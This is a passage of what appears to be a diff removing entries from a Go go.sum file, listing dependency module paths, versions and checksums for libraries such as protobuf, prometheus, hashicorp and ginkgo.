h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q= -github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58= -github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= -github.com/golang/groupcache v0.0.0-20160516000752-02826c3e7903/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= -github.com/golang/groupcache v0.0.0-20190702054246-869f871628b6/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= -github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= -github.com/golang/mock v1.2.0/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= -github.com/golang/protobuf v0.0.0-20161109072736-4bd1920723d7/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= -github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= -github.com/golang/protobuf v1.3.1/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= -github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= -github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= -github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= -github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= -github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= -github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= -github.com/golang/protobuf v1.4.2 h1:+Z5KGCizgyZCbGh1KZqA0fcLLkwbsjIzS4aV2v7wJX0= -github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= -github.com/google/btree v0.0.0-20180813153112-4030bb1f1f0c/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ= -github.com/google/btree v1.0.0 h1:0udJVsspx3VBr5FwtLhQQtuAsVc79tTq0ocGIPAU6qo= -github.com/google/btree 
v1.0.0/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ= -github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= -github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= -github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= -github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= -github.com/google/go-cmp v0.5.2 h1:X2ev0eStA3AbceY54o37/0PQ/UWqKEiiO2dKL5OPaFM= -github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= -github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= -github.com/google/gofuzz v1.1.0 h1:Hsa8mG0dQ46ij8Sl2AYJDUv1oA9/d6Vk+3LG99Oe02g= -github.com/google/gofuzz v1.1.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= -github.com/google/martian v2.1.0+incompatible/go.mod h1:9I4somxYTbIHy5NJKHRl3wXiIaQGbYVAs8BPL6v8lEs= -github.com/google/pprof v0.0.0-20181206194817-3ea8567a2e57/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc= -github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= -github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= -github.com/googleapis/gnostic v0.0.0-20170729233727-0c5108395e2d/go.mod h1:sJBsCZ4ayReDTBIg8b9dl28c5xFWyhBTVRp3pOg5EKY= -github.com/googleapis/gnostic v0.1.0/go.mod h1:sJBsCZ4ayReDTBIg8b9dl28c5xFWyhBTVRp3pOg5EKY= -github.com/gophercloud/gophercloud v0.1.0/go.mod h1:vxM41WHh5uqHVBMZHzuwNOHh8XEoIEcSTewFxm1c5g8= -github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1/go.mod h1:wJfORRmW1u3UXTncJ5qlYoELFm8eSnnEO6hX4iZ3EWY= -github.com/gopherjs/gopherjs v0.0.0-20200217142428-fce0ec30dd00/go.mod h1:wJfORRmW1u3UXTncJ5qlYoELFm8eSnnEO6hX4iZ3EWY= -github.com/gregjones/httpcache v0.0.0-20180305231024-9cad4c3443a7/go.mod h1:FecbI9+v66THATjSRHfNgh1IVFe/9kFxbXtjV0ctIMA= -github.com/hashicorp/errwrap v1.0.0 h1:hLrqtEDnRye3+sgx6z4qVLNuviH3MR5aQ0ykNJa/UYA= 
-github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4= -github.com/hashicorp/go-immutable-radix v1.0.0 h1:AKDB1HM5PWEA7i4nhcpwOrO2byshxBjXVn/J/3+z5/0= -github.com/hashicorp/go-immutable-radix v1.0.0/go.mod h1:0y9vanUI8NX6FsYoO3zeMjhV/C5i9g4Q3DwcSNZ4P60= -github.com/hashicorp/go-msgpack v0.5.3 h1:zKjpN5BK/P5lMYrLmBHdBULWbJ0XpYR+7NGzqkZzoD4= -github.com/hashicorp/go-msgpack v0.5.3/go.mod h1:ahLV/dePpqEmjfWmKiqvPkv/twdG7iPBM1vqhUKIvfM= -github.com/hashicorp/go-multierror v1.0.0 h1:iVjPR7a6H0tWELX5NxNe7bYopibicUzc7uPribsnS6o= -github.com/hashicorp/go-multierror v1.0.0/go.mod h1:dHtQlpGsu+cZNNAkkCN/P3hoUDHhCYQXV3UM06sGGrk= -github.com/hashicorp/go-sockaddr v1.0.0 h1:GeH6tui99pF4NJgfnhp+L6+FfobzVW3Ah46sLo0ICXs= -github.com/hashicorp/go-sockaddr v1.0.0/go.mod h1:7Xibr9yA9JjQq1JpNB2Vw7kxv8xerXegt+ozgdvDeDU= -github.com/hashicorp/go-uuid v1.0.0 h1:RS8zrF7PhGwyNPOtxSClXXj9HA8feRnJzgnI1RJCSnM= -github.com/hashicorp/go-uuid v1.0.0/go.mod h1:6SBZvOh/SIDV7/2o3Jml5SYk/TvGqwFJ/bN7x4byOro= -github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8= -github.com/hashicorp/golang-lru v0.5.1 h1:0hERBMJE1eitiLkihrMvRVBYAkpHzc/J3QdDN+dAcgU= -github.com/hashicorp/golang-lru v0.5.1/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8= -github.com/hashicorp/memberlist v0.1.4 h1:gkyML/r71w3FL8gUi74Vk76avkj/9lYAY9lvg0OcoGs= -github.com/hashicorp/memberlist v0.1.4/go.mod h1:ajVTdAv/9Im8oMAAj5G31PhhMCZJV2pPBoIllUwCN7I= -github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU= -github.com/imdario/mergo v0.3.5/go.mod h1:2EnlNZ0deacrJVfApfmtdGgDfMuh/nq6Ok1EcJh5FfA= -github.com/instana/go-sensor v1.4.16 h1:0tMdsO4WdduVhT0nJjriBp+tv+36d8Q1/8m6vUy9gS8= -github.com/instana/go-sensor v1.4.16/go.mod h1:P1ynE0u78bUBZ2GkWewRpAO1/w1oW9CKDozeueH6QSg= -github.com/json-iterator/go v1.1.6/go.mod h1:+SdeFBvtyEkXs7REEP0seUULqWtbJapLOCVDaaPEHmU= -github.com/json-iterator/go v1.1.8 
h1:QiWkFLKq0T7mpzwOTu6BzNDbfTE8OLrYhVKYMLF46Ok= -github.com/json-iterator/go v1.1.8/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= -github.com/jstemmer/go-junit-report v0.0.0-20190106144839-af01ea7f8024/go.mod h1:6v2b51hI/fHJwM22ozAgKL4VKDeJcHhJFhtBdhmNjmU= -github.com/jtolds/gls v4.20.0+incompatible/go.mod h1:QJZ7F/aHp+rZTRtaJ1ow/lLfFfVYBRgL+9YlvaHOwJU= -github.com/julienschmidt/httprouter v1.2.0/go.mod h1:SYymIcj16QtmaHHD7aYtjjsJG7VTCxuUUipMqKk8s4w= -github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00= -github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8= -github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= -github.com/konsorten/go-windows-terminal-sequences v1.0.1 h1:mweAR1A6xJ3oS2pRaGiHgQ4OO8tzTaLawm8vnODuwDk= -github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= -github.com/kr/logfmt v0.0.0-20140226030751-b84e30acd515/go.mod h1:+0opPa2QZZtGFBFZlji/RkVcI2GknAs/DXo4wKdlNEc= -github.com/kr/pretty v0.1.0 h1:L/CwN0zerZDmRFUapSPitk6f+Q3+0za1rQkzVuMiMFI= -github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= -github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= -github.com/kr/pty v1.1.5/go.mod h1:9r2w37qlBe7rQ6e1fg1S/9xpWHSnaqNdHD3WcMdbPDA= -github.com/kr/text v0.1.0 h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE= -github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= -github.com/lightstep/lightstep-tracer-common/golang/gogo v0.0.0-20210210170715-a8dfcb80d3a7 h1:YjW+hUb8Fh2S58z4av4t/0cBMK/Q0aP48RocCFsC8yI= -github.com/lightstep/lightstep-tracer-common/golang/gogo v0.0.0-20210210170715-a8dfcb80d3a7/go.mod h1:Spd59icnvRxSKuyijbbwe5AemzvcyXAUBgApa7VybMw= -github.com/lightstep/lightstep-tracer-go v0.24.1-0.20210318180546-a67254760a58 h1:qPPXc3iS7MH/+rrKjoWJvAxl0ju66uPTYiTupe7OIUM= 
-github.com/lightstep/lightstep-tracer-go v0.24.1-0.20210318180546-a67254760a58/go.mod h1:dUti2qkbGISTJF6xN0Jj6/WxxNFYDmHJBPGkOaCYAi8= -github.com/looplab/fsm v0.1.0 h1:Qte7Zdn/5hBNbXzP7yxVU4OIFHWXBovyTT2LaBTyC20= -github.com/looplab/fsm v0.1.0/go.mod h1:m2VaOfDHxqXBBMgc26m6yUOwkFn8H2AlJDE+jd/uafI= -github.com/mailru/easyjson v0.0.0-20160728113105-d5b7844b561a/go.mod h1:C1wdFJiN94OJF2b5HbByQZoLdCWB1Yqtg26g4irojpc= -github.com/mailru/easyjson v0.0.0-20190614124828-94de47d64c63/go.mod h1:C1wdFJiN94OJF2b5HbByQZoLdCWB1Yqtg26g4irojpc= -github.com/mailru/easyjson v0.0.0-20190626092158-b2ccc519800e/go.mod h1:C1wdFJiN94OJF2b5HbByQZoLdCWB1Yqtg26g4irojpc= -github.com/mailru/easyjson v0.7.0/go.mod h1:KAzv3t3aY1NaHWoQz1+4F1ccyAH66Jk7yos7ldAVICs= -github.com/matttproud/golang_protobuf_extensions v1.0.1 h1:4hp9jkHxhMHkqkrB3Ix0jegS5sx/RkqARlsWZ6pIwiU= -github.com/matttproud/golang_protobuf_extensions v1.0.1/go.mod h1:D8He9yQNgCq6Z5Ld7szi9bcBfOoFv/3dc6xSMkL2PC0= -github.com/miekg/dns v1.0.14/go.mod h1:W1PPwlIAgtquWBMBEV9nkV9Cazfe8ScdGz/Lj7v3Nrg= -github.com/miekg/dns v1.1.41 h1:WMszZWJG0XmzbK9FEmzH2TVcqYzFesusSIB41b8KHxY= -github.com/miekg/dns v1.1.41/go.mod h1:p6aan82bvRIyn+zDIv9xYNUpwa73JcSh9BKwknJysuI= -github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= -github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg= -github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= -github.com/modern-go/reflect2 v0.0.0-20180701023420-4b7aa43c6742/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0= -github.com/modern-go/reflect2 v1.0.1 h1:9f412s+6RmYXLWZSEzVVgPGK7C2PphHj5RJrvfx9AWI= -github.com/modern-go/reflect2 v1.0.1/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0= -github.com/munnerz/goautoneg v0.0.0-20120707110453-a547fc61f48d/go.mod h1:+n7T8mK8HuQTcFwEeznm/DIxMOiR9yIdICNftLE1DvQ= 
-github.com/mwitkow/go-conntrack v0.0.0-20161129095857-cc309e4a2223/go.mod h1:qRWi+5nqEBWmkhHvq77mSJWrCKwh8bxhgT7d/eI7P4U= -github.com/mxk/go-flowrate v0.0.0-20140419014527-cca7078d478f/go.mod h1:ZdcZmHo+o7JKHSa8/e818NopupXU1YMK5fe1lsApnBw= -github.com/nxadm/tail v1.4.4 h1:DQuhQpB1tVlglWS2hLQ5OV6B5r8aGxSrPc5Qo6uTN78= -github.com/nxadm/tail v1.4.4/go.mod h1:kenIhsEOeOJmVchQTgglprH7qJGnHDVpk1VPCcaMI8A= -github.com/oklog/ulid v1.3.1 h1:EGfNDEx6MqHz8B3uNV6QAib1UR2Lm97sHi3ocA6ESJ4= -github.com/oklog/ulid v1.3.1/go.mod h1:CirwcVhetQ6Lv90oh/F+FBtV6XMibvdAFo93nm5qn4U= -github.com/onsi/ginkgo v0.0.0-20170829012221-11459a886d9c/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE= -github.com/onsi/ginkgo v1.6.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE= -github.com/onsi/ginkgo v1.7.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE= -github.com/onsi/ginkgo v1.10.1/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE= -github.com/onsi/ginkgo v1.11.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE= -github.com/onsi/ginkgo v1.12.1/go.mod h1:zj2OWP4+oCPe1qIXoGWkgMRwljMUYCdkwsT2108oapk= -github.com/onsi/ginkgo v1.14.2 h1:8mVmC9kjFFmA8H4pKMUhcblgifdkOIXPvbhN1T36q1M= -github.com/onsi/ginkgo v1.14.2/go.mod h1:iSB4RoI2tjJc9BBv4NKIKWKya62Rps+oPG/Lv9klQyY= -github.com/onsi/gomega v0.0.0-20170829124025-dcabb60a477c/go.mod h1:C1qb7wdrVGGVU+Z6iS04AVkA3Q65CEZX59MT0QO5uiA= -github.com/onsi/gomega v1.4.3/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY= -github.com/onsi/gomega v1.7.0/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY= -github.com/onsi/gomega v1.7.1/go.mod h1:XdKZgCCFLUoM/7CFJVPcG8C1xQ1AJ0vpAezJrB7JYyY= -github.com/onsi/gomega v1.10.1/go.mod h1:iN09h71vgCQne3DLsj+A5owkum+a2tYe+TOCB1ybHNo= -github.com/onsi/gomega v1.10.3 h1:gph6h/qe9GSUw1NhH1gp+qb+h8rXD8Cy60Z32Qw3ELA= -github.com/onsi/gomega v1.10.3/go.mod h1:V9xEwhxec5O8UDM77eCW8vLymOMltsqPVYWrpDsH8xc= -github.com/opentracing/basictracer-go v1.0.0 
h1:YyUAhaEfjoWXclZVJ9sGoNct7j4TVk7lZWlQw5UXuoo= -github.com/opentracing/basictracer-go v1.0.0/go.mod h1:QfBfYuafItcjQuMwinw9GhYKwFXS9KnPs5lxoYwgW74= -github.com/opentracing/opentracing-go v1.0.2/go.mod h1:UkNAQd3GIcIGf0SeVgPpRdFStlNbqXla1AfSYxPUl2o= -github.com/opentracing/opentracing-go v1.1.0 h1:pWlfV3Bxv7k65HYwkikxat0+s3pV4bsqf19k25Ur8rU= -github.com/opentracing/opentracing-go v1.1.0/go.mod h1:UkNAQd3GIcIGf0SeVgPpRdFStlNbqXla1AfSYxPUl2o= -github.com/pascaldekloe/goe v0.0.0-20180627143212-57f6aae5913c h1:Lgl0gzECD8GnQ5QCWA8o6BtfL6mDH5rQgM4/fX3avOs= -github.com/pascaldekloe/goe v0.0.0-20180627143212-57f6aae5913c/go.mod h1:lzWF7FIEvWOWxwDKqyGYQf6ZUaNfKdP144TG7ZOy1lc= -github.com/peterbourgon/diskv v2.0.1+incompatible/go.mod h1:uqqh8zWWbv1HBMNONnaR/tNboyR3/BZd58JJSHlUSCU= -github.com/pkg/errors v0.8.0/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= -github.com/pkg/errors v0.8.1 h1:iURUrRGxPUNPdy5/HRSm+Yj6okJ6UtLINN0Q9M4+h3I= -github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= -github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= -github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= -github.com/pquerna/cachecontrol v0.0.0-20180517163645-1555304b9b35 h1:J9b7z+QKAmPf4YLrFg6oQUotqHQeUNWwkvo7jZp1GLU= -github.com/pquerna/cachecontrol v0.0.0-20180517163645-1555304b9b35/go.mod h1:prYjPmNq4d1NPVmpShWobRqXY3q7Vp+80DqgxxUrUIA= -github.com/prometheus/client_golang v0.9.1/go.mod h1:7SWBe2y4D6OKWSNQJUaRYU/AaXPKyh/dDVn+NZz0KFw= -github.com/prometheus/client_golang v1.0.0 h1:vrDKnkGzuGvhNAL56c7DBz29ZL+KxnoR0x7enabFceM= -github.com/prometheus/client_golang v1.0.0/go.mod h1:db9x61etRT2tGnBNRi70OPL5FsnadC4Ky3P0J6CfImo= -github.com/prometheus/client_model v0.0.0-20180712105110-5c3871d89910/go.mod h1:MbSGuTsp3dbXC40dX6PRTWyKYBIrTGTE9sqQNg2J8bo= -github.com/prometheus/client_model v0.0.0-20190129233127-fd36f4220a90 h1:S/YWwWx/RA8rT8tKFRuGUZhuA90OyIBpPCXkcbwU8DE= 
-github.com/prometheus/client_model v0.0.0-20190129233127-fd36f4220a90/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= -github.com/prometheus/common v0.4.1 h1:K0MGApIoQvMw27RTdJkPbr3JZ7DNbtxQNyi5STVM6Kw= -github.com/prometheus/common v0.4.1/go.mod h1:TNfzLD0ON7rHzMJeJkieUDPYmFC7Snx/y86RQel1bk4= -github.com/prometheus/procfs v0.0.0-20181005140218-185b4288413d/go.mod h1:c3At6R/oaqEKCNdg8wHV1ftS6bRYblBhIjjI8uT2IGk= -github.com/prometheus/procfs v0.0.2 h1:6LJUbpNm42llc4HRCuvApCSWB/WfhuNo9K98Q9sNGfs= -github.com/prometheus/procfs v0.0.2/go.mod h1:TjEm7ze935MbeOT/UhFTIMYKhuLP4wbCsTZCD3I8kEA= -github.com/rcrowley/go-metrics v0.0.0-20181016184325-3113b8401b8a h1:9ZKAASQSHhDYGoxY8uLVpewe1GDZ2vu2Tr/vTdVAkFQ= -github.com/rcrowley/go-metrics v0.0.0-20181016184325-3113b8401b8a/go.mod h1:bCqnVzQkZxMG4s8nGwiZ5l3QUCyqpo9Y+/ZMZ9VjZe4= -github.com/remyoudompheng/bigfft v0.0.0-20170806203942-52369c62f446/go.mod h1:uYEyJGbgTkfkS4+E/PavXkNJcbFIpEtjt2B0KDQ5+9M= -github.com/sanity-io/litter v1.1.0 h1:BllcKWa3VbZmOZbDCoszYLk7zCsKHz5Beossi8SUcTc= -github.com/sanity-io/litter v1.1.0/go.mod h1:CJ0VCw2q4qKU7LaQr3n7UOSHzgEMgcGco7N/SkZQPjw= -github.com/sarslanhan/cronmask v0.0.0-20190709075623-766eca24d011 h1:S5j3KTsiGwmQSEJJBp0iIG87CDBCGCwbYLmVv8L/nuE= -github.com/sarslanhan/cronmask v0.0.0-20190709075623-766eca24d011/go.mod h1:NmI1tg7wwsf1hF6G5EtyGCrtNKsH2RIdYYoJa7GsnP8= -github.com/sean-/seed v0.0.0-20170313163322-e2103e2c3529 h1:nn5Wsu0esKSJiIVhscUtVbo7ada43DJhG55ua/hjS5I= -github.com/sean-/seed v0.0.0-20170313163322-e2103e2c3529/go.mod h1:DxrIzT+xaE7yg65j358z/aeFdxmN0P9QXhEzd20vsDc= -github.com/shirou/gopsutil v2.20.1+incompatible/go.mod h1:5b4v6he4MtMOwMlS0TUMTu2PcXUg8+E1lC7eC3UO/RA= -github.com/shirou/gopsutil v3.21.2+incompatible h1:U+YvJfjCh6MslYlIAXvPtzhW3YZEtc9uncueUNpD/0A= -github.com/shirou/gopsutil v3.21.2+incompatible/go.mod h1:5b4v6he4MtMOwMlS0TUMTu2PcXUg8+E1lC7eC3UO/RA= -github.com/sirupsen/logrus v1.2.0/go.mod h1:LxeOpSwHxABJmUn/MG1IvRgCAasNZTLOkJPxbbu5VWo= 
-github.com/sirupsen/logrus v1.4.2 h1:SPIRibHv4MatM3XXNO2BJeFLZwZ2LvZgfQ5+UNI2im4= -github.com/sirupsen/logrus v1.4.2/go.mod h1:tLMulIdttU9McNUspp0xgXVQah82FyeX6MwdIuYE2rE= -github.com/smartystreets/assertions v0.0.0-20180927180507-b2de0cb4f26d/go.mod h1:OnSkiWE9lh6wB0YB77sQom3nweQdgAjqCqsofrRNTgc= -github.com/smartystreets/assertions v1.1.1/go.mod h1:tcbTF8ujkAEcZ8TElKY+i30BzYlVhC/LOxJk7iOWnoo= -github.com/smartystreets/goconvey v1.6.4/go.mod h1:syvi0/a8iFYH4r/RixwvyeAJjdLS9QV7WQ/tjFTllLA= -github.com/sony/gobreaker v0.4.1 h1:oMnRNZXX5j85zso6xCPRNPtmAycat+WcoKbklScLDgQ= -github.com/sony/gobreaker v0.4.1/go.mod h1:ZKptC7FHNvhBz7dN2LGjPVBz2sZJmc0/PkyDJOjmxWY= -github.com/spf13/afero v1.2.2/go.mod h1:9ZxEEn6pIJ8Rxe320qSDBk6AsU0r9pR7Q4OcevTdifk= -github.com/spf13/pflag v0.0.0-20170130214245-9ff6c6923cff/go.mod h1:DYY7MBk1bdzusC3SYhjObp+wFpr4gzcvqqNjLnInEg4= -github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA= -github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg= -github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= -github.com/stretchr/objx v0.1.1/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= -github.com/stretchr/objx v0.2.0/go.mod h1:qt09Ya8vawLte6SNmTgCsAVtYtaKzEcn8ATUoHMkEqE= -github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs= -github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= -github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= -github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0= -github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= -github.com/szuecs/rate-limit-buffer v0.7.1 h1:kpVLwDvpCTFQi8uhiXQrhAKWzNUaEKhArFdjb4GQ8F4= -github.com/szuecs/rate-limit-buffer v0.7.1/go.mod h1:BxqrsmnHsCnWcvbtdcaDLEBmjNEvRFU5LQ8edoZ9B0M= -github.com/szuecs/routegroup-client v0.17.7 
h1:kwFU9/r4yiWnk+DKox367EO25JsKfdFdJMREduWWKgs= -github.com/szuecs/routegroup-client v0.17.7/go.mod h1:lHgfovfWP6h6zQoWjVmhUWYrSa62yXstI3uCtgTdTuk= -github.com/tidwall/gjson v1.7.4 h1:19cchw8FOxkG5mdLRkGf9jqIqEyqdZhPqW60XfyFxk8= -github.com/tidwall/gjson v1.7.4/go.mod h1:5/xDoumyyDNerp2U36lyolv46b3uF/9Bu6OfyQ9GImk= -github.com/tidwall/match v1.0.3 h1:FQUVvBImDutD8wJLN6c5eMzWtjgONK9MwIBCOrUJKeE= -github.com/tidwall/match v1.0.3/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM= -github.com/tidwall/pretty v1.1.0 h1:K3hMW5epkdAVwibsQEfR/7Zj0Qgt4DxtNumTq/VloO8= -github.com/tidwall/pretty v1.1.0/go.mod h1:XNkn88O1ChpSDQmQeStsy+sBenx6DDtFZJxhVysOjyk= -github.com/tklauser/go-sysconf v0.3.5 h1:uu3Xl4nkLzQfXNsWn15rPc/HQCJKObbt1dKJeWp3vU4= -github.com/tklauser/go-sysconf v0.3.5/go.mod h1:MkWzOF4RMCshBAMXuhXJs64Rte09mITnppBXY/rYEFI= -github.com/tklauser/numcpus v0.2.2 h1:oyhllyrScuYI6g+h/zUvNXNp1wy7x8qQy3t/piefldA= -github.com/tklauser/numcpus v0.2.2/go.mod h1:x3qojaO3uyYt0i56EW/VUYs7uBvdl2fkfZFu0T9wgjM= -github.com/uber-go/atomic v1.4.0 h1:yOuPqEq4ovnhEjpHmfFwsqBXDYbQeT6Nb0bwD6XnD5o= -github.com/uber-go/atomic v1.4.0/go.mod h1:/Ct5t2lcmbJ4OSe/waGBoaVvVqtO0bmtfVNex1PFV8g= -github.com/uber/jaeger-client-go v2.16.0+incompatible h1:Q2Pp6v3QYiocMxomCaJuwQGFt7E53bPYqEgug/AoBtY= -github.com/uber/jaeger-client-go v2.16.0+incompatible/go.mod h1:WVhlPFC8FDjOFMMWRy2pZqQJSXxYSwNYOkTr/Z6d3Kk= -github.com/uber/jaeger-lib v2.0.0+incompatible h1:iMSCV0rmXEogjNWPh2D0xk9YVKvrtGoHJNe9ebLu/pw= -github.com/uber/jaeger-lib v2.0.0+incompatible/go.mod h1:ComeNDZlWwrWnDv8aPp0Ba6+uUTzImX/AauajbLI56U= -github.com/yookoala/gofast v0.6.0 h1:E5x2acfUD7GkzCf8bmIMwnV10VxDy5tUCHc5LGhluwc= -github.com/yookoala/gofast v0.6.0/go.mod h1:OJU201Q6HCaE1cASckaTbMm3KB6e0cZxK0mgqfwOKvQ= -github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= -github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= -github.com/yuin/gopher-lua 
